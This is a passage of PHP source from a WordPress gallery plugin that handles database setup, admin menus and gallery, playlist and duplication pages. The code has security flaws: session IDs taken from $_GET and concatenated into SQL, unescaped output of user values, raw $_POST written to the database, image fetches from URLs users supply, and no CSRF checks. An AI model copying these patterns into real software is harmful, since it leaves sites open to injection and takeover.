<?php
/*
Plugin Name: Accordion Slider PRO
Description: This plugin will allow you to insert on your page a multimedia accordion.
Version: 1.2
Author: Lambert Group
Author URI: https://codecanyon.net/user/LambertGroup/portfolio?ref=LambertGroup
Text Domain: accordion-pro
*/

ini_set('display_errors', 0);
$lbg_accordion_slider_pro_path = trailingslashit(dirname(__FILE__));  //empty

//all the messages
$lbg_accordion_slider_pro_messages = array(
		'version' => __('<div class="error">LambertGroup - Accordion Slider PRO plugin requires WordPress 3.0 or newer. <a href="https://codex.wordpress.org/Upgrading_WordPress">Please update!</a></div>', 'accordion-pro' ),
		'data_saved' => __('Data Saved!', 'accordion-pro' ),
		'empty_name' => __('Name - required', 'accordion-pro' ),
		'empty_img' => __('Image - required', 'accordion-pro' ),
		'empty_ogg' => __('OGG - required', 'accordion-pro' ),
		'empty_gallery' => __('Select Accordion - required', 'accordion-pro' ),
		'empty_folder' => __('Folder Path - required', 'accordion-pro' ),
		'invalid_request' => __('Invalid Request!', 'accordion-pro' ),
		'generate_for_this_gallery' => __('You can start customizing this gallery.', 'accordion-pro' ),
		'duplicate_complete' => __('Duplication process is complete!', 'accordion-pro' ),
		'folder_read' => __('The playlist was generated! Go to "Manage Accordions" and check the "Playlist" for the selected gallery', 'accordion-pro' ),
		'no_jpg' => __('No JPG/JPEG/PNG files in this folder!', 'accordion-pro' )
	);


global $wp_version;

if ( !version_compare($wp_version,"3.0",">=")) {
	die (esc_html($lbg_accordion_slider_pro_messages['version'], 'accordion-pro' ));
}




function lbg_accordion_slider_pro_activate() {
	//db creation, create admin options etc.
	global $wpdb;

	$lbg_accordion_slider_pro_collate = ' COLLATE utf8_general_ci';

	$sql0 = "CREATE TABLE `" . $wpdb->prefix . "lbg_accordion_slider_pro_galleries` (
			`id` INT UNSIGNED NOT NULL AUTO_INCREMENT ,
			`name` VARCHAR( 255 ) NOT NULL ,
			PRIMARY KEY ( `id` )
			) ENGINE=MyISAM  DEFAULT CHARSET=utf8";

	$sql1 = "CREATE TABLE `" . $wpdb->prefix . "lbg_accordion_slider_pro_settings` (
  `id` smallint(5) unsigned NOT NULL AUTO_INCREMENT,
	`width` smallint(5) unsigned NOT NULL DEFAULT '1000',
  `height` smallint(5) unsigned NOT NULL DEFAULT '600',
  `width100Proc` varchar(8) NOT NULL DEFAULT 'false',
  `height100Proc` varchar(8) NOT NULL DEFAULT 'false',
	`rows` smallint(5) unsigned NOT NULL DEFAULT '1',
	`columns` smallint(5) unsigned NOT NULL DEFAULT '6',
	`orientation` varchar(15) NOT NULL DEFAULT 'horizontal',
	`numberOfItems` smallint(5) unsigned NOT NULL DEFAULT '3',
	`onlyInnerGutter` varchar(8) NOT NULL DEFAULT 'false',
	`centerGallery` varchar(8) NOT NULL DEFAULT 'true',
	`gutter` smallint(5) unsigned NOT NULL DEFAULT '2',
	`galleryBg` varchar(15) NOT NULL DEFAULT 'FFFFFF',
	`itemBorderWidth` smallint(5) unsigned NOT NULL DEFAULT '0',
	`itemBorderColorOFF` varchar(15) NOT NULL DEFAULT 'transparent',
	`itemBorderColorON` varchar(15) NOT NULL DEFAULT 'FF0000',
	`showImageDescription` varchar(8) NOT NULL DEFAULT 'true',
	`imageDescriptionBgColor` varchar(15) NOT NULL DEFAULT '000000',
	`imageDescriptionBgOpacity` smallint(5) unsigned NOT NULL DEFAULT '30',
	`imageDescriptionTextColor` varchar(15) NOT NULL DEFAULT 'FFFFFF',
	`showIconOverImage` varchar(8) NOT NULL DEFAULT 'true',
	`zoomDuration` smallint(5) unsigned NOT NULL DEFAULT '1',
	`zoomEffect` varchar(80) NOT NULL DEFAULT 'linear',
	`target` varchar(8) NOT NULL DEFAULT '_blank',
	`bgHorizontalPosition` varchar(8) NOT NULL DEFAULT 'center',
	`bgVerticalPosition` varchar(8) NOT NULL DEFAULT 'center',
	`facebookAppID` varchar(255) NOT NULL DEFAULT '',
	`delay` smallint(5) unsigned NOT NULL DEFAULT '1',
	  PRIMARY KEY  (`id`)
	) ENGINE=MyISAM  DEFAULT CHARSET=utf8";

	$sql2 = "CREATE TABLE `". $wpdb->prefix . "lbg_accordion_slider_pro_playlist` (
	  `id` int(10) unsigned NOT NULL auto_increment,
	  `galleryid` int(10) unsigned NOT NULL,
		`img` text,
	  `data_horizontal` text,
	  `data_vertical` text,
	  `data_link` text,
	  `data_lightbox` text,
		`data_title` text,
	  `data_description` text,
		`img_width` float,
		`img_height` float,
	  `ord` int(10) unsigned NOT NULL,
	  PRIMARY KEY  (`id`)
	) ENGINE=MyISAM  DEFAULT CHARSET=utf8";

	require_once(ABSPATH . 'wp-admin/includes/upgrade.php');
	dbDelta($sql0.$lbg_accordion_slider_pro_collate);
	dbDelta($sql1.$lbg_accordion_slider_pro_collate);
	dbDelta($sql2.$lbg_accordion_slider_pro_collate);


	//initialize the galleries table with the first gallery type
	$rows_count = $wpdb->get_var( "SELECT COUNT(*) FROM ". $wpdb->prefix ."lbg_accordion_slider_pro_galleries;" );
	if (!$rows_count) {
		$wpdb->insert(
			$wpdb->prefix . "lbg_accordion_slider_pro_galleries",
			array(
				'name' => 'Default Accordion'
			),
			array(
				'%s'
			)
		);
	}

	// initialize the settings
	$rows_count = $wpdb->get_var( "SELECT COUNT(*) FROM ". $wpdb->prefix ."lbg_accordion_slider_pro_settings;" );
	if (!$rows_count) {
		lbg_accordion_slider_pro_insert_settings_record(1);
	}




}



function lbg_accordion_slider_pro_insert_settings_record($gallery_id) {
	global $wpdb;
	$wpdb->insert(
			$wpdb->prefix . "lbg_accordion_slider_pro_settings",
			array(
				'width' => 1000
			),
			array(
				'%d'
			)
		);
}


function lbg_accordion_slider_pro_init_sessions() {
	global $wpdb;
	if (is_admin()) {
		if (!session_id()) {
			session_start();

			//initialize the session
			if (!isset($_SESSION['xid'])) {
				$safe_sql="SELECT * FROM (".$wpdb->prefix ."lbg_accordion_slider_pro_galleries) LIMIT 0, 1";
				$row = $wpdb->get_row($safe_sql,ARRAY_A);
				//$row=lbg_accordion_slider_pro_unstrip_array($row);
				$_SESSION['xid'] = $row['id'];
				$_SESSION['xname'] = $row['name'];
			}
		}
	}
}

function lbg_accordion_slider_pro_end_sessions() {
		if (is_admin()) {
			session_destroy();
		}
}


function lbg_accordion_slider_pro_load_styles() {
	if(strpos($_SERVER['PHP_SELF'], 'wp-admin') !== false) { //loads css in admin
		$page = (isset($_GET['page'])) ? $_GET['page'] : '';
		if(preg_match('/LBG_ACCORDION_SLIDER_PRO/i', $page)) {

			//wp_enqueue_style('accordion_slider_pro_jquery-custom_css', plugins_url('css/custom-theme/jquery-ui-1.8.10.custom.css', __FILE__));
			wp_enqueue_style('lbg-jquery-ui-custom_css', 'https://ajax.googleapis.com/ajax/libs/jqueryui/1.10.3/themes/pepper-grinder/jquery-ui.min.css');
			wp_enqueue_style('accordion_slider_pro_css', plugins_url('css/styles.css', __FILE__));
			wp_enqueue_style('accordion_slider_pro_colorpicker_css', plugins_url('css/colorpicker/colorpicker.css', __FILE__));

			wp_enqueue_style('thickbox');
		}
	} else if (!is_admin()) { //loads css in front-end
		wp_enqueue_style('accordion_slider_pro_site_css', plugins_url('accordion_slider_pro/css/accordion_slider_pro.css', __FILE__));
		wp_enqueue_style('lbg_accordion_slider_pro_prettyPhoto_css', plugins_url('accordion_slider_pro/css/prettyPhoto.css', __FILE__));
	}
}

function lbg_accordion_slider_pro_load_scripts() {
	$page = (isset($_GET['page'])) ? $_GET['page'] : '';
	if(preg_match('/LBG_ACCORDION_SLIDER_PRO/i', $page)) {
		//loads scripts in admin
		//if (is_admin()) {
			/*wp_deregister_script('jquery-ui-core');
			wp_deregister_script('jquery-ui-widget');
			wp_deregister_script('jquery-ui-mouse');
			wp_deregister_script('jquery-ui-accordion');
			wp_deregister_script('jquery-ui-autocomplete');
			wp_deregister_script('jquery-ui-slider');
			wp_deregister_script('jquery-ui-tabs');
			wp_deregister_script('jquery-ui-sortable');
			wp_deregister_script('jquery-ui-draggable');
			wp_deregister_script('jquery-ui-droppable');
			wp_deregister_script('jquery-ui-selectable');
			wp_deregister_script('jquery-ui-position');
			wp_deregister_script('jquery-ui-datepicker');
			wp_deregister_script('jquery-ui-resizable');
			wp_deregister_script('jquery-ui-dialog');
			wp_deregister_script('jquery-ui-button');	*/

			wp_enqueue_script('jquery');
			/*wp_register_script('lbg-admin-jquery', plugins_url('js/jquery-1.5.1.js', __FILE__));
			wp_enqueue_script('lbg-admin-jquery');*/

			//wp_register_script('lbg-admin-jquery-ui-min', plugins_url('js/jquery-ui-1.8.10.custom.min.js', __FILE__));
			//wp_register_script('lbg-admin-jquery-ui-min', 'https://ajax.googleapis.com/ajax/libs/jqueryui/1.8.23/jquery-ui.min.js');
			/*wp_register_script('lbg-admin-jquery-ui-min', 'https://ajax.googleapis.com/ajax/libs/jqueryui/1.9.2/jquery-ui.min.js');
			wp_enqueue_script('lbg-admin-jquery-ui-min');*/
			wp_enqueue_script('jquery-ui-core');
			wp_enqueue_script('jquery-ui-widget');
			wp_enqueue_script('jquery-ui-mouse');
			wp_enqueue_script('jquery-ui-accordion');
			wp_enqueue_script('jquery-ui-autocomplete');
			wp_enqueue_script('jquery-ui-slider');
			wp_enqueue_script('jquery-ui-tabs');
			wp_enqueue_script('jquery-ui-sortable');
			wp_enqueue_script('jquery-ui-draggable');
			wp_enqueue_script('jquery-ui-droppable');
			wp_enqueue_script('jquery-ui-selectable');
			wp_enqueue_script('jquery-ui-position');
			wp_enqueue_script('jquery-ui-datepicker');
			wp_enqueue_script('jquery-ui-resizable');
			wp_enqueue_script('jquery-ui-dialog');
			wp_enqueue_script('jquery-ui-button');/***************************/

			wp_enqueue_script('jquery-form');
			wp_enqueue_script('jquery-color');
			wp_enqueue_script('jquery-masonry');
			wp_enqueue_script('jquery-ui-progressbar');
			wp_enqueue_script('jquery-ui-tooltip');

			wp_enqueue_script('jquery-effects-core');
			wp_enqueue_script('jquery-effects-blind');
			wp_enqueue_script('jquery-effects-bounce');
			wp_enqueue_script('jquery-effects-clip');
			wp_enqueue_script('jquery-effects-drop');
			wp_enqueue_script('jquery-effects-explode');
			wp_enqueue_script('jquery-effects-fade');
			wp_enqueue_script('jquery-effects-fold');
			wp_enqueue_script('jquery-effects-highlight');
			wp_enqueue_script('jquery-effects-pulsate');
			wp_enqueue_script('jquery-effects-scale');
			wp_enqueue_script('jquery-effects-shake');
			wp_enqueue_script('jquery-effects-slide');
			wp_enqueue_script('jquery-effects-transfer');

			wp_register_script('lbg-admin-colorpicker', plugins_url('js/colorpicker/colorpicker.js', __FILE__),array('jquery'),false,false);
			wp_enqueue_script('lbg-admin-colorpicker');

			wp_register_script('lbg-admin-toggle', plugins_url('js/myToggle.js', __FILE__),array('jquery'),false,false);
			wp_enqueue_script('lbg-admin-toggle');

			/*wp_enqueue_script('media-upload');*/   //old
			wp_enqueue_script('media-upload'); // before w.p 3.5
			wp_enqueue_media();// from w.p 3.5
			wp_enqueue_script('thickbox');


		//}

		//wp_enqueue_script('jquery');
		//wp_enqueue_script('jquery-ui-core');
		//wp_enqueue_script('jquery-ui-sortable');
		//wp_enqueue_script('thickbox');
		//wp_enqueue_script('media-upload');
		//wp_enqueue_script('farbtastic');
	} else if (!is_admin()) { //loads scripts in front-end
			/*wp_deregister_script('jquery-ui-core');
			wp_deregister_script('jquery-ui-widget');
			wp_deregister_script('jquery-ui-mouse');
			wp_deregister_script('jquery-ui-accordion');
			wp_deregister_script('jquery-ui-autocomplete');
			wp_deregister_script('jquery-ui-slider');
			wp_deregister_script('jquery-ui-tabs');
			wp_deregister_script('jquery-ui-sortable');
			wp_deregister_script('jquery-ui-draggable');
			wp_deregister_script('jquery-ui-droppable');
			wp_deregister_script('jquery-ui-selectable');
			wp_deregister_script('jquery-ui-position');
			wp_deregister_script('jquery-ui-datepicker');
			wp_deregister_script('jquery-ui-resizable');
			wp_deregister_script('jquery-ui-dialog');
			wp_deregister_script('jquery-ui-button');*/

		wp_enqueue_script('jquery');

		//wp_enqueue_script('jquery-ui-core');

		//wp_register_script('lbg-jquery-ui-min', 'https://ajax.googleapis.com/ajax/libs/jqueryui/1.8.23/jquery-ui.min.js');
		/*wp_register_script('lbg-jquery-ui-min', 'https://ajax.googleapis.com/ajax/libs/jqueryui/1.9.2/jquery-ui.min.js');
		wp_enqueue_script('lbg-jquery-ui-min');*/

			wp_enqueue_script('jquery-ui-core');
			/*wp_enqueue_script('jquery-ui-widget');
			wp_enqueue_script('jquery-ui-mouse');
			wp_enqueue_script('jquery-ui-accordion');
			wp_enqueue_script('jquery-ui-autocomplete');*/
			wp_enqueue_script('jquery-ui-slider');
			/*wp_enqueue_script('jquery-ui-tabs');
			wp_enqueue_script('jquery-ui-sortable');
			wp_enqueue_script('jquery-ui-draggable');
			wp_enqueue_script('jquery-ui-droppable');
			wp_enqueue_script('jquery-ui-selectable');
			wp_enqueue_script('jquery-ui-position');
			wp_enqueue_script('jquery-ui-datepicker');
			wp_enqueue_script('jquery-ui-resizable');
			wp_enqueue_script('jquery-ui-dialog');
			wp_enqueue_script('jquery-ui-button');

			wp_enqueue_script('jquery-form');
			wp_enqueue_script('jquery-color');
			wp_enqueue_script('jquery-masonry');*/
			wp_enqueue_script('jquery-ui-progressbar');
			/*wp_enqueue_script('jquery-ui-tooltip');*/

			wp_enqueue_script('jquery-effects-core');
			/*wp_enqueue_script('jquery-effects-blind');
			wp_enqueue_script('jquery-effects-bounce');
			wp_enqueue_script('jquery-effects-clip');
			wp_enqueue_script('jquery-effects-drop');
			wp_enqueue_script('jquery-effects-explode');
			wp_enqueue_script('jquery-effects-fade');
			wp_enqueue_script('jquery-effects-fold');
			wp_enqueue_script('jquery-effects-highlight');
			wp_enqueue_script('jquery-effects-pulsate');
			wp_enqueue_script('jquery-effects-scale');
			wp_enqueue_script('jquery-effects-shake');
			wp_enqueue_script('jquery-effects-slide');
			wp_enqueue_script('jquery-effects-transfer');*/



			wp_register_script('accordion_slider_pro', plugins_url('accordion_slider_pro/js/accordion_slider_pro.js', __FILE__),array('jquery'),false,false);
			wp_enqueue_script('accordion_slider_pro');

			wp_register_script('lbg-accordion_slider_pro-prettyPhoto', plugins_url('accordion_slider_pro/js/jquery.prettyPhoto.js', __FILE__),array('jquery'),false,false);
			wp_enqueue_script('lbg-accordion_slider_pro-prettyPhoto');

			wp_register_script('lbg-pinit', plugins_url('accordion_slider_pro/js/my_pinit.js', __FILE__),array('jquery'),false,false);
			wp_enqueue_script('lbg-pinit');


	}

}



// adds the menu pages
function lbg_accordion_slider_pro_plugin_menu() {
	add_menu_page('LBG ACCORDION SLIDER PRO Admin Interface', 'ACCORDION SLIDER PRO', 'edit_posts', 'LBG_ACCORDION_SLIDER_PRO', 'lbg_accordion_slider_pro_overview_page',
	plugins_url('images/lbg_gallery_icon.png', __FILE__));
	add_submenu_page( 'LBG_ACCORDION_SLIDER_PRO', 'LBG ACCORDION SLIDER PRO Overview', 'Overview', 'edit_posts', 'LBG_ACCORDION_SLIDER_PRO', 'lbg_accordion_slider_pro_overview_page');
	add_submenu_page( 'LBG_ACCORDION_SLIDER_PRO', 'LBG ACCORDION SLIDER PRO Manage Galleries', 'Manage Accordions', 'edit_posts', 'LBG_ACCORDION_SLIDER_PRO_Manage_Galleries', 'lbg_accordion_slider_pro_player_manage_galleries_page');
	add_submenu_page( 'LBG_ACCORDION_SLIDER_PRO', 'LBG ACCORDION SLIDER PRO Manage Galleries Add New', 'Add New', 'edit_posts', 'LBG_ACCORDION_SLIDER_PRO_Add_New', 'lbg_accordion_slider_pro_player_manage_galleries_add_new_page');
	add_submenu_page( 'LBG ACCORDION SLIDER PRO Manage Galleries', 'LBG ACCORDION SLIDER PRO Gallery Settings', 'Accordion Settings', 'edit_posts', 'LBG_ACCORDION_SLIDER_PRO_Settings', 'lbg_accordion_slider_pro_player_settings_page');
	add_submenu_page( 'LBG ACCORDION SLIDER PRO Manage Galleries', 'LBG ACCORDION SLIDER PRO Gallery Playlist', 'Playlist', 'edit_posts', 'LBG_ACCORDION_SLIDER_PRO_Playlist', 'lbg_accordion_slider_pro_player_playlist_page');
	add_submenu_page( 'LBG_ACCORDION_SLIDER_PRO_Settings', 'LBG ACCORDION SLIDER PRO Gallery Settings', 'Duplicate Accordion', 'edit_posts', 'LBG_ACCORDION_SLIDER_PRO_Duplicate_Gallery', 'lbg_accordion_slider_pro_duplicate_gallery_page');
	/*add_submenu_page( 'LBG_ACCORDION_SLIDER_PRO', 'LBG ACCORDION SLIDER PRO Read Folder', 'Generate Playlist From Folder', 'edit_posts', 'LBG_ACCORDION_SLIDER_PRO_Read_Folder', 'lbg_accordion_slider_pro_player_read_folder_page');*/
	add_submenu_page( 'LBG_ACCORDION_SLIDER_PRO', 'LBG ACCORDION SLIDER PRO Help', 'Help', 'edit_posts', 'LBG_ACCORDION_SLIDER_PRO_Help', 'lbg_accordion_slider_pro_player_help_page');
}


//HTML content for overview page
function lbg_accordion_slider_pro_overview_page()
{
	global $lbg_accordion_slider_pro_path;
	include_once($lbg_accordion_slider_pro_path . 'tpl/overview.php');
}

//HTML content for Manage Galleries
function lbg_accordion_slider_pro_player_manage_galleries_page()
{
	global $wpdb;
	global $lbg_accordion_slider_pro_messages;
	global $lbg_accordion_slider_pro_path;

	//delete gallery
	if (isset($_GET['id'])) {
		//delete from wp_lbg_accordion_slider_pro_galleries
		$wpdb->query($wpdb->prepare("DELETE FROM ".$wpdb->prefix."lbg_accordion_slider_pro_galleries WHERE id = %d",$_GET['id']));

		//delete from wp_lbg_accordion_slider_pro_settings
		$wpdb->query($wpdb->prepare("DELETE FROM ".$wpdb->prefix."lbg_accordion_slider_pro_settings WHERE id = %d",$_GET['id']));

		//delete from wp_lbg_accordion_slider_pro_playlist
		$wpdb->query($wpdb->prepare("DELETE FROM ".$wpdb->prefix."lbg_accordion_slider_pro_playlist WHERE galleryid = %d",$_GET['id']));

		//initialize the session
		$safe_sql="SELECT * FROM (".$wpdb->prefix ."lbg_accordion_slider_pro_galleries) ORDER BY id";
		$row = $wpdb->get_row($safe_sql,ARRAY_A);
		$row=lbg_accordion_slider_pro_unstrip_array($row);
		if ($row['id']) {
			$_SESSION['xid']=$row['id'];
			$_SESSION['xname']=$row['name'];
		}
	}


	$safe_sql="SELECT * FROM (".$wpdb->prefix ."lbg_accordion_slider_pro_galleries) ORDER BY id";
	$result = $wpdb->get_results($safe_sql,ARRAY_A);
	include_once($lbg_accordion_slider_pro_path . 'tpl/galleries.php');

}


//HTML content for Manage Galleries - Add New
function lbg_accordion_slider_pro_player_manage_galleries_add_new_page()
{
	global $wpdb;
	global $lbg_accordion_slider_pro_messages;
	global $lbg_accordion_slider_pro_path;

	if(array_key_exists('Submit', $_POST) && $_POST['Submit'] == 'Add New') {
		$errors_arr=array();
		if (empty($_POST['name']))
			$errors_arr[]=$lbg_accordion_slider_pro_messages['empty_name'];

		if (count($errors_arr)) {
				include_once($lbg_accordion_slider_pro_path . 'tpl/add_gallery.php'); ?>
				<div id="error" class="error"><p><?php echo implode("<br>", $errors_arr);?></p></div>
		  	<?php } else { // no errors
					$wpdb->insert(
						$wpdb->prefix . "lbg_accordion_slider_pro_galleries",
						array(
							'name' => $_POST['name']
						),
						array(
							'%s'
						)
					);
					//insert default gallery settings for this new gallery
					lbg_accordion_slider_pro_insert_settings_record($wpdb->insert_id);
					?>
						<div class="wrap">
							<div id="lbg_logo">
								<h2>Manage Accordions - Add New Accordion</h2>
				 			</div>
							<div id="message" class="updated"><p><?php esc_html_e($lbg_accordion_slider_pro_messages['data_saved'], 'accordion-pro' );?></p><p><?php esc_html_e($lbg_accordion_slider_pro_messages['generate_for_this_gallery'], 'accordion-pro' );?></p></div>
							<div>
								<p>&raquo; <a href="?page=LBG_ACCORDION_SLIDER_PRO_Add_New">Add New (gallery)</a></p>
								<p>&raquo; <a href="?page=LBG_ACCORDION_SLIDER_PRO_Manage_Galleries">Back to Manage Accordions</a></p>
							</div>
						</div>
		  	<?php }
	} else {
		include_once($lbg_accordion_slider_pro_path . 'tpl/add_gallery.php');
	}

}


//HTML content for galleriesettings
function lbg_accordion_slider_pro_player_settings_page()
{
	global $wpdb;
	global $lbg_accordion_slider_pro_messages;
	global $lbg_accordion_slider_pro_path;

	if (isset($_GET['id']) && isset($_GET['name'])) {
		$_SESSION['xid']=$_GET['id'];
		$_SESSION['xname']=$_GET['name'];
	}

	$wpdb->show_errors();
	/*if (check_admin_referer('lbg_accordion_slider_pro_settings_update')) {
		echo "update";
	}*/

	if(array_key_exists('Submit', $_POST) && $_POST['Submit'] == 'Update Accordion Settings') {
		$_GET['xmlf']='';
		$except_arr=array('Submit','name','pll_ajax_backend','page_scroll_to_id_instances','_wp_http_referer','set_key_auth','_wpnonce');
			$wpdb->update(
				$wpdb->prefix .'lbg_accordion_slider_pro_galleries',
				array(
				'name' => $_POST['name']
				),
				array( 'id' => $_SESSION['xid'] )
			);
			$_SESSION['xname']=stripslashes($_POST['name']);


			foreach ($_POST as $key=>$val){
				if (in_array($key,$except_arr)) {
					unset($_POST[$key]);
				}
			}

			$wpdb->update(
				$wpdb->prefix .'lbg_accordion_slider_pro_settings',
				$_POST,
				array( 'id' => $_SESSION['xid'] )
			);

			?>
			<div id="message" class="updated"><p><?php esc_html_e($lbg_accordion_slider_pro_messages['data_saved'], 'accordion-pro' );?></p></div>
	<?php
	}


	//echo "WP_PLUGIN_URL: ".WP_PLUGIN_URL;
	$safe_sql=$wpdb->prepare( "SELECT * FROM (".$wpdb->prefix ."lbg_accordion_slider_pro_settings) WHERE id = %d",$_SESSION['xid'] );
	$row = $wpdb->get_row($safe_sql,ARRAY_A);
	$row=lbg_accordion_slider_pro_unstrip_array($row);
	$_POST = $row;
	$_POST=lbg_accordion_slider_pro_unstrip_array($_POST);
	include_once($lbg_accordion_slider_pro_path . 'tpl/settings_form.php');

}


function lbg_accordion_slider_pro_player_playlist_page()
{
	global $wpdb;
	global $lbg_accordion_slider_pro_messages;
	global $lbg_accordion_slider_pro_path;

	if (isset($_GET['id']) && isset($_GET['name'])) {
		$_SESSION['xid']=$_GET['id'];
		$_SESSION['xname']=$_GET['name'];
	}



	if (array_key_exists('xmlf', $_GET) && $_GET['xmlf']=='add_playlist_record') {
		if(array_key_exists('Submit', $_POST) && $_POST['Submit'] == 'Add Record') {
			$errors_arr=array();
			if (empty($_POST['img']))
				 $errors_arr[]=$lbg_accordion_slider_pro_messages['empty_img'];
			/*if (empty($_POST['ogg']))
				 $errors_arr[]=$lbg_accordion_slider_pro_messages['empty_ogg'];*/


			if (count($errors_arr)) {
				include_once($lbg_accordion_slider_pro_path . 'tpl/add_playlist_record.php'); ?>
				<div id="error" class="error"><p><?php echo implode("<br>", $errors_arr);?></p></div>
	  <?php } else { // all requested fields are filled



		if (count($errors_arr)) {
			include_once($lbg_accordion_slider_pro_path . 'tpl/add_playlist_record.php'); ?>
			<div id="error" class="error"><p><?php echo implode("<br>", $errors_arr);?></p></div>
	  	<?php } else { // no upload errors
				$max_ord = 1+$wpdb->get_var( $wpdb->prepare( "SELECT max(ord) FROM ". $wpdb->prefix ."lbg_accordion_slider_pro_playlist WHERE galleryid = %d",$_SESSION['xid'] ) );

				if (strpos($_POST['img'], 'wp-content',9)===false)
					list($width, $height, $type, $attr) = getimagesize($_POST['img']);
				else
					list($width, $height, $type, $attr) = getimagesize( ABSPATH.substr($_POST['img'],strpos($_POST['img'], 'wp-content',9)) );

				$wpdb->insert(
					$wpdb->prefix . "lbg_accordion_slider_pro_playlist",
					array(
						'galleryid' => $_POST['galleryid'],
						'img' => $_POST['img'],
						'data_horizontal' => $_POST['data_horizontal'],
						'data_vertical' => $_POST['data_vertical'],
						'data_title' => $_POST['data_title'],
						'data_description' => $_POST['data_description'],
						'data_lightbox' => $_POST['data_lightbox'],
						'data_link' => $_POST['data_link'],
						'img_width' => $width,
						'img_height' => $height,
						'ord' => $max_ord
					),
					array(
						'%d',
						'%s',
						'%s',
						'%s',
						'%s',
						'%s',
						'%s',
						'%s',
						'%d',
						'%d',
						'%d'
					)
				);

	  			if (isset($_POST['setitfirst'])) {
					$sql_arr=array();
					$ord_start=$max_ord;
					$ord_stop=1;
					$elem_id=$wpdb->insert_id;
					$ord_direction='+1';

					$sql_arr[]="UPDATE ".$wpdb->prefix."lbg_accordion_slider_pro_playlist SET ord=ord+1  WHERE galleryid = ".$_SESSION['xid']." and ord>=".$ord_stop." and ord<".$ord_start;
					$sql_arr[]="UPDATE ".$wpdb->prefix."lbg_accordion_slider_pro_playlist SET ord=".$ord_stop." WHERE id=".$elem_id;

					//echo "elem_id: ".$elem_id."----ord_start: ".$ord_start."----ord_stop: ".$ord_stop;
					foreach ($sql_arr as $sql)
						$wpdb->query($sql);
				}
				?>
					<div class="wrap">
						<div id="lbg_logo">
							<h2>Playlist for gallery: <span style="color:#FF0000; font-weight:bold;"><?php echo $_SESSION['xname']?> - ID #<?php echo $_SESSION['xid']?></span> - Add New</h2>
			 			</div>
						<div id="message" class="updated"><p><?php esc_html_e($lbg_accordion_slider_pro_messages['data_saved'], 'accordion-pro' );?></p></div>
						<div>
							<p>&raquo; <a href="?page=LBG_ACCORDION_SLIDER_PRO_Playlist&xmlf=add_playlist_record">Add New</a></p>
							<p>&raquo; <a href="?page=LBG_ACCORDION_SLIDER_PRO_Playlist">Back to Playlist</a></p>
						</div>
					</div>
	  	<?php }
	  		}
		} else {
			include_once($lbg_accordion_slider_pro_path . 'tpl/add_playlist_record.php');
		}

	} else {
		$safe_sql=$wpdb->prepare( "SELECT * FROM (".$wpdb->prefix ."lbg_accordion_slider_pro_playlist) WHERE galleryid = %d ORDER BY ord",$_SESSION['xid'] );
		$result = $wpdb->get_results($safe_sql,ARRAY_A);

		//$_POST=lbg_accordion_slider_pro_unstrip_array($_POST);
		include_once($lbg_accordion_slider_pro_path . 'tpl/playlist.php');
	}
}


//HTML duplicate gallery
function lbg_accordion_slider_pro_duplicate_gallery_page()
{
	global $wpdb;
	global $lbg_accordion_slider_pro_messages;
	global $lbg_accordion_slider_pro_path;

	if (isset($_GET['id']) && isset($_GET['name'])) {
		$_SESSION['xid']=$_GET['id'];
		$_SESSION['xname']=$_GET['name'];
	}

	$wpdb->show_errors();


	//echo "WP_PLUGIN_URL: ".WP_PLUGIN_URL;
	//$safe_sql=$wpdb->prepare( "INSERT INTO ".$wpdb->prefix ."lbg_accordion_slider_pro_settings SELECT * FROM (".$wpdb->prefix ."lbg_accordion_slider_pro_settings) WHERE id = %d",$_SESSION['xid'] );
	//insert gallery
	$wpdb->insert(
			$wpdb->prefix . "lbg_accordion_slider_pro_galleries",
			array(
				'name' => 'Duplicate of Accordion '.$_SESSION['xid']
			),
			array(
				'%s'
			)
		);
		$galleryid=$wpdb->insert_id;

	//duplicate settings
	$safe_sql=$wpdb->prepare( "INSERT INTO ".$wpdb->prefix ."lbg_accordion_slider_pro_settings (`width`, `height`, `width100Proc`, `height100Proc`, `rows`, `columns`, `centerGallery`, `gutter`, `galleryBg`, `itemBorderWidth`, `itemBorderColorOFF`, `itemBorderColorON`, `showImageDescription`, `imageDescriptionBgColor`, `imageDescriptionBgOpacity`, `imageDescriptionTextColor`, `showIconOverImage`, `zoomDuration`, `zoomEffect`, `target`, `bgHorizontalPosition`, `bgVerticalPosition`, `facebookAppID`, `delay`, `orientation`, `numberOfItems`, `onlyInnerGutter`) SELECT `width`, `height`, `width100Proc`, `height100Proc`, `rows`, `columns`, `centerGallery`, `gutter`, `galleryBg`, `itemBorderWidth`, `itemBorderColorOFF`, `itemBorderColorON`, `showImageDescription`, `imageDescriptionBgColor`, `imageDescriptionBgOpacity`, `imageDescriptionTextColor`, `showIconOverImage`, `zoomDuration`, `zoomEffect`, `target`, `bgHorizontalPosition`, `bgVerticalPosition`, `facebookAppID`, `delay`, `orientation`, `numberOfItems`, `onlyInnerGutter` FROM (".$wpdb->prefix ."lbg_accordion_slider_pro_settings) WHERE id = %d",$_SESSION['xid'] );
	$wpdb->query($safe_sql);


	//playlist
	$safe_sql=$wpdb->prepare( "SELECT * FROM (".$wpdb->prefix ."lbg_accordion_slider_pro_playlist) WHERE galleryid = %d",$_SESSION['xid'] );
	$result = $wpdb->get_results($safe_sql,ARRAY_A);
	foreach ( $result as $row_playlist ) {
		$row_playlist=lbg_accordion_slider_pro_unstrip_array($row_playlist);

		$safe_sql=$wpdb->prepare( "INSERT INTO ".$wpdb->prefix ."lbg_accordion_slider_pro_playlist ( `galleryid`, `img`, `data_horizontal`, `data_vertical`, `data_link`, `data_lightbox`, `data_title`, `data_description`, `img_width`, `img_height`, `ord` ) SELECT ".$galleryid." , `img`, `data_horizontal`, `data_vertical`, `data_link`, `data_lightbox`, `data_title`, `data_description`, `img_width`, `img_height`, `ord` FROM (".$wpdb->prefix ."lbg_accordion_slider_pro_playlist) WHERE id = %d",$row_playlist['id'] );
		$wpdb->query($safe_sql);
		//$photoid=$wpdb->insert_id;
		//echo $wpdb->last_query;

	}
	?>
	<div id="message" class="updated"><p><?php esc_html_e($lbg_accordion_slider_pro_messages['duplicate_complete'], 'accordion-pro' );?></p></div>
	<?php

	//echo $wpdb->last_query;
	$safe_sql="SELECT * FROM (".$wpdb->prefix ."lbg_accordion_slider_pro_galleries) ORDER BY id";
	$result = $wpdb->get_results($safe_sql,ARRAY_A);
	include_once($lbg_accordion_slider_pro_path . 'tpl/galleries.php');


}


function lbg_accordion_slider_pro_read_jpg_meta($the_img) {
	$exif = exif_read_data($the_img, 0, true);
	return $exif;
}


function lbg_accordion_slider_pro_player_read_folder_page()
{
	global $wpdb;
	global $lbg_accordion_slider_pro_messages;
	global $lbg_accordion_slider_pro_path;

	$files_expensions=array('jpg','JPG','jpeg','JPEG','png','PNG');


